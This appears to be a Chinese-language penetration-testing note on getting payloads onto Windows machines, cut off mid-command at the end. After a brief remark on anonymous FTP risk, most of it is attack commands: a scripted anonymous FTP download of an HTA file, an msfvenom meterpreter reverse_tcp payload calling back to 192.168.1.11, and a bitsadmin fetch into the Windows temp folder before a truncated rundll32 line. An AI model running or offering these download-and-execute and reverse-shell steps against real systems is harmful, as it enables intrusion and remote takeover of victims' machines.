Windows
FTP
ftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。
还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。
py开启ftp服务
pip3 install pyftpdlib
python3 -m pyftpdlib
脚本文件ftp.txt,用于连接ftp服务,下载文件
copy con ftp.txt
open 192.168.1.111 2121
anonymous
anonymous
get hello.hta
quit
执行文件
ftp -i -s : ftp.txt
Bitsadmin
BitsAdamin是一个命令行工具,可以使用它创建下载或上传作业,并监视进度。
使用流程就是通过msfvenom生成木马,并上传到自己的服务器,然后靶机通过bitsadmin远程下载文件并执行
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.11 lport=6666 -f hta-psh > hello.hta
bitsadmin /transfer shell http://192.168.1.11/hello.hta C:\windows\temp\hello.hta
rundll32.exe url.dl